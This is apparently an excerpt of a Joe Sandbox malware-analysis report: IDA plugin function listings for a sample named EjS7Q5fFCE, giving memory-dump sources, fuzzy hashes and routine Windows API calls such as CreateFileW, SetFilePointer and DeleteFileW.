• Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
• Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID: C
• API String ID: 1269201914-1915930400
• Opcode ID: 97d19b82dcf35b656be410511fad1d674c02787a1b3ce51c461910141d6e0164
• Instruction ID: 5359edb63d434a3202bd2e236c40f941e7798a0cd45cc2656431328f3cf646ce
• Opcode Fuzzy Hash: 97d19b82dcf35b656be410511fad1d674c02787a1b3ce51c461910141d6e0164
• Instruction Fuzzy Hash: 9AA012D115A101FC300821431C02C37010CC0C8B15730542FFC02C00C1684868050839
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0043E51F
  • Part of subcall function 0043E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0043E8D0
  • Part of subcall function 0043E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0043E8E1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
• Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID: PDu<C
• API String ID: 1269201914-3993865770
• Opcode ID: 9158e3f5162376bdd9ff70717c75b6180947ada705020e7e5ab0d5f078b7fa46
• Instruction ID: 0d9c436c1c24097cf15a49e544fec7db3d9d01dab3566da000a8d3442a5541bb
• Opcode Fuzzy Hash: 9158e3f5162376bdd9ff70717c75b6180947ada705020e7e5ab0d5f078b7fa46
• Instruction Fuzzy Hash: 4EA012C155A101BC300821431C02C3B010CC0C9F1D730641FF811800C168480C450839
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0043E51F
  • Part of subcall function 0043E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0043E8D0
  • Part of subcall function 0043E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0043E8E1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
• Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID: PDu<C
• API String ID: 1269201914-3993865770
• Opcode ID: 4a0001aac8aec21e5cf2e9beb39e96b5fd7a93c7af4900ef9b23326f5e29c3b4
• Instruction ID: 0d9c436c1c24097cf15a49e544fec7db3d9d01dab3566da000a8d3442a5541bb
• Opcode Fuzzy Hash: 4a0001aac8aec21e5cf2e9beb39e96b5fd7a93c7af4900ef9b23326f5e29c3b4
• Instruction Fuzzy Hash: 4EA012C155A101BC300821431C02C3B010CC0C9F1D730641FF811800C168480C450839
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0043E51F
  • Part of subcall function 0043E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0043E8D0
  • Part of subcall function 0043E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0043E8E1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
• Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID: PDu<C
• API String ID: 1269201914-3993865770
• Opcode ID: a427eb20c0febd9152250908f22d699174b1b8f91ee32a86da7dfa09fc89fa3b
• Instruction ID: 0d9c436c1c24097cf15a49e544fec7db3d9d01dab3566da000a8d3442a5541bb
• Opcode Fuzzy Hash: a427eb20c0febd9152250908f22d699174b1b8f91ee32a86da7dfa09fc89fa3b
• Instruction Fuzzy Hash: 4EA012C155A101BC300821431C02C3B010CC0C9F1D730641FF811800C168480C450839
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0043E51F
  • Part of subcall function 0043E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0043E8D0
  • Part of subcall function 0043E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0043E8E1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
• Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID: PDu<C
• API String ID: 1269201914-3993865770
• Opcode ID: 397e79076212cfee48d6eb3c25e8cb4c3818b4feb63581f99cd41db9a260cc68
• Instruction ID: 0d9c436c1c24097cf15a49e544fec7db3d9d01dab3566da000a8d3442a5541bb
• Opcode Fuzzy Hash: 397e79076212cfee48d6eb3c25e8cb4c3818b4feb63581f99cd41db9a260cc68
• Instruction Fuzzy Hash: 4EA012C155A101BC300821431C02C3B010CC0C9F1D730641FF811800C168480C450839
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0043E580
  • Part of subcall function 0043E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0043E8D0
  • Part of subcall function 0043E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0043E8E1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
• Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID: FjunC
• API String ID: 1269201914-662778638
• Opcode ID: 5e0e0f12efd55ba43e8be84d705a3a00e758bca456b2e8b79017bd26ba8bb287
• Instruction ID: 428c108683e66c54ce19138fb9e854a3f0a910d07748d0049631d20670d720b5
• Opcode Fuzzy Hash: 5e0e0f12efd55ba43e8be84d705a3a00e758bca456b2e8b79017bd26ba8bb287
• Instruction Fuzzy Hash: 8EA012C15961007C300821A31C02C37010CC0C4B1A730611FF800810C168480905083D
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0043E580
  • Part of subcall function 0043E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0043E8D0
  • Part of subcall function 0043E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0043E8E1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
• Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID: FjunC
• API String ID: 1269201914-662778638
• Opcode ID: 0f2fcf9c0e6786c1d51ca35882452dbcfc6707c27522bb2c2b7441727946dfd3
• Instruction ID: 286df3d719093ab3b87094417bb43b1054ee3d04efe9105f90827b3394b83210
• Opcode Fuzzy Hash: 0f2fcf9c0e6786c1d51ca35882452dbcfc6707c27522bb2c2b7441727946dfd3
• Instruction Fuzzy Hash: 73A012C155A101BC300821931C02C37010CC0C8B19730641FF801810C168480805083D
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0043E580
  • Part of subcall function 0043E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0043E8D0
  • Part of subcall function 0043E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0043E8E1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
• Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID: FjunC
• API String ID: 1269201914-662778638
• Opcode ID: cd02cf175b51a168fd2b6d2aa6f29daacd1bf472742759fb8ca9cf2a3695a12e
• Instruction ID: 286df3d719093ab3b87094417bb43b1054ee3d04efe9105f90827b3394b83210
• Opcode Fuzzy Hash: cd02cf175b51a168fd2b6d2aa6f29daacd1bf472742759fb8ca9cf2a3695a12e
• Instruction Fuzzy Hash: 73A012C155A101BC300821931C02C37010CC0C8B19730641FF801810C168480805083D
APIs
  • Part of subcall function 0044B7BB: GetOEMCP.KERNEL32(00000000,?,?,0044BA44,?), ref: 0044B7E6
• IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0044BA89,?,00000000), ref: 0044BC64
• GetCPInfo.KERNEL32(00000000,0044BA89,?,?,?,0044BA89,?,00000000), ref: 0044BC77
Memory Dump Source
• Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
• Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
Similarity
• API ID: CodeInfoPageValid
• String ID:
• API String ID: 546120528-0
• Opcode ID: 0837f79f19ea17c7131ebb7427e29e3b60659d45c3085ea4dfd85edb730a7b21
• Instruction ID: 7e1f4ca7b095689c04ed21fddc9320ab050c45b425d687f9670b5483702b0b93
• Opcode Fuzzy Hash: 0837f79f19ea17c7131ebb7427e29e3b60659d45c3085ea4dfd85edb730a7b21
• Instruction Fuzzy Hash: F65133B0D002059EFB248F36C8816BBBBE4EF41304F1844AFD4968B252D73CDA469BD8
                                                              APIs
                                                              • SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00429A50,?,?,00000000,?,?,00428CBC,?), ref: 00429BAB
                                                              • GetLastError.KERNEL32(?,00000000,00428411,-00009570,00000000,000007F3), ref: 00429BB6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                               • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: ErrorFileLastPointer
                                                              • String ID:
                                                              • API String ID: 2976181284-0
                                                              • Opcode ID: 6bf592597a0821fe31cc0574a2b910c285530050fe4ee693ff4360a67415e59d
                                                              • Instruction ID: daf6935b69d07449eb0a618d82f63b5078cd2b79fb8c2edca176f0e1346cca3b
                                                              • Opcode Fuzzy Hash: 6bf592597a0821fe31cc0574a2b910c285530050fe4ee693ff4360a67415e59d
                                                              • Instruction Fuzzy Hash: 4D41BA30B043618BDB24DF25F58446BBBE5FFD5321F548A2EE88183361D778BC058A99
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 00421E55
                                                                • Part of subcall function 00423BBA: __EH_prolog.LIBCMT ref: 00423BBF
                                                              • _wcslen.LIBCMT ref: 00421EFD
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                               • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: H_prolog$_wcslen
                                                              • String ID:
                                                              • API String ID: 2838827086-0
                                                              • Opcode ID: 6437b99e1135f550b4182afe0ef2eef5547d9244c81d3b61ccfa64c625d7b2bd
                                                              • Instruction ID: 1ad9d1b4f2bedaa81b5fc638f21581da8dd46b9ec93be8fd54dbecde5f6681f4
                                                              • Opcode Fuzzy Hash: 6437b99e1135f550b4182afe0ef2eef5547d9244c81d3b61ccfa64c625d7b2bd
                                                              • Instruction Fuzzy Hash: 6B314C71A041199FCF15EF99D945ADEFBF5AF58304F60006EE845A7261C73A5E00CB68
                                                              APIs
                                                              • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,004273BC,?,?,?,00000000), ref: 00429DBC
                                                              • SetFileTime.KERNELBASE(?,?,?,?), ref: 00429E70
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                               • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: File$BuffersFlushTime
                                                              • String ID:
                                                              • API String ID: 1392018926-0
                                                              • Opcode ID: 3b9a6b4528fa73611f9176fcc977246c2cb19f1da2bbebb4e7564c3b363d56d4
                                                              • Instruction ID: 4c6b27f8f090a1086ca5a7912cb6f97165e4fcf0002177d298fab9e1d7722f70
                                                              • Opcode Fuzzy Hash: 3b9a6b4528fa73611f9176fcc977246c2cb19f1da2bbebb4e7564c3b363d56d4
                                                              • Instruction Fuzzy Hash: B621EE31358356ABC714CF25D891AABBBE4AF55704F48481EF8C583681D32DED0C9B66
                                                              APIs
                                                              • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00429F27,?,?,0042771A), ref: 004296E6
                                                              • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00429F27,?,?,0042771A), ref: 00429716
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                               • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID:
                                                              • API String ID: 823142352-0
                                                              • Opcode ID: bd8479f2199c5a3da3b050f4955fd389e2fa5d9954ab2a7e0bfb160637bd8af0
                                                              • Instruction ID: 645db117780e066cce02f63cdca9959750d225c6beadaa57fbcaa0f5274bc5cf
                                                              • Opcode Fuzzy Hash: bd8479f2199c5a3da3b050f4955fd389e2fa5d9954ab2a7e0bfb160637bd8af0
                                                              • Instruction Fuzzy Hash: 7821F171204354AFE3308A65DC89FA777DCEB49325F800A2EF9D5C26C1C778AC848635
                                                              APIs
                                                              • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00429EC7
                                                              • GetLastError.KERNEL32 ref: 00429ED4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                               • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: ErrorFileLastPointer
                                                              • String ID:
                                                              • API String ID: 2976181284-0
                                                              • Opcode ID: 97e4848949969db3a95a3a6a2e40761c2d418359ccc1aae8388d25e7cbbcc902
                                                              • Instruction ID: 60a83f69784e54fc7292f45633c3cf15b08e98295b827fe175533e4250e855d1
                                                              • Opcode Fuzzy Hash: 97e4848949969db3a95a3a6a2e40761c2d418359ccc1aae8388d25e7cbbcc902
                                                              • Instruction Fuzzy Hash: F7112530700320ABD724CA28D840BA7B3E9AB04371F914A2BE152D26E0E3B8ED45C768
                                                              APIs
                                                              • _free.LIBCMT ref: 00448E75
                                                                • Part of subcall function 00448E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0044CA2C,00000000,?,00446CBE,?,00000008,?,004491E0,?,?,?), ref: 00448E38
                                                              • HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,00461098,004217CE,?,?,00000007,?,?,?,004213D6,?,00000000), ref: 00448EB1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                               • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: Heap$AllocAllocate_free
                                                              • String ID:
                                                              • API String ID: 2447670028-0
                                                              • Opcode ID: 44d16d746f3ac10c6bb2760d8f94291b3442d4da3cfaba498e39172f6d5e5dad
                                                              • Instruction ID: 2349335ece3ecbd38627e19d4348b0150518b27b5ca92f4d9fc0e168dbf0c6ec
                                                              • Opcode Fuzzy Hash: 44d16d746f3ac10c6bb2760d8f94291b3442d4da3cfaba498e39172f6d5e5dad
                                                              • Instruction Fuzzy Hash: 5EF0623260161566FB216A669C05B6F37588F91B70F34412FF814E7291DF6CDD0191AD
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32(?,?), ref: 004310AB
                                                              • GetProcessAffinityMask.KERNEL32(00000000), ref: 004310B2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                               • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: Process$AffinityCurrentMask
                                                              • String ID:
                                                              • API String ID: 1231390398-0
                                                              • Opcode ID: dd7a20fbc498ea15930a4fb8eae05677e33f139569367912466320fe66971f55
                                                              • Instruction ID: 7be212562820072e4906fa0d4d82e4f15e7d983c6a6592da7684ae62b4e30e63
                                                              • Opcode Fuzzy Hash: dd7a20fbc498ea15930a4fb8eae05677e33f139569367912466320fe66971f55
                                                              • Instruction Fuzzy Hash: D5E0D832B01289A7CF0D8BB49C058EB73FDEA48345B10A176E403E7655F938DE414A64
                                                              APIs
                                                              • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0042A325,?,?,?,0042A175,?,00000001,00000000,?,?), ref: 0042A501
                                                                • Part of subcall function 0042BB03: _wcslen.LIBCMT ref: 0042BB27
                                                              • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0042A325,?,?,?,0042A175,?,00000001,00000000,?,?), ref: 0042A532
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                               • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AttributesFile$_wcslen
                                                              • String ID:
                                                              • API String ID: 2673547680-0
                                                              • Opcode ID: 80a681d06a54f64d9a8d63cda6fab614372749dd51fc21eae6d07e18ca495068
                                                              • Instruction ID: c386ad17da136a87e757e3760152184973f3fa65842f2bc6e7f93783741e1768
                                                              • Opcode Fuzzy Hash: 80a681d06a54f64d9a8d63cda6fab614372749dd51fc21eae6d07e18ca495068
                                                              • Instruction Fuzzy Hash: 79F0A0312003197BDF025F61EC01FDA376CAB04786F848062BC44D51A0DB35DAD4DA54
                                                              APIs
                                                              • DeleteFileW.KERNELBASE(000000FF,?,?,0042977F,?,?,004295CF,?,?,?,?,?,00452641,000000FF), ref: 0042A1F1
                                                                • Part of subcall function 0042BB03: _wcslen.LIBCMT ref: 0042BB27
                                                              • DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,0042977F,?,?,004295CF,?,?,?,?,?,00452641), ref: 0042A21F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                               • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
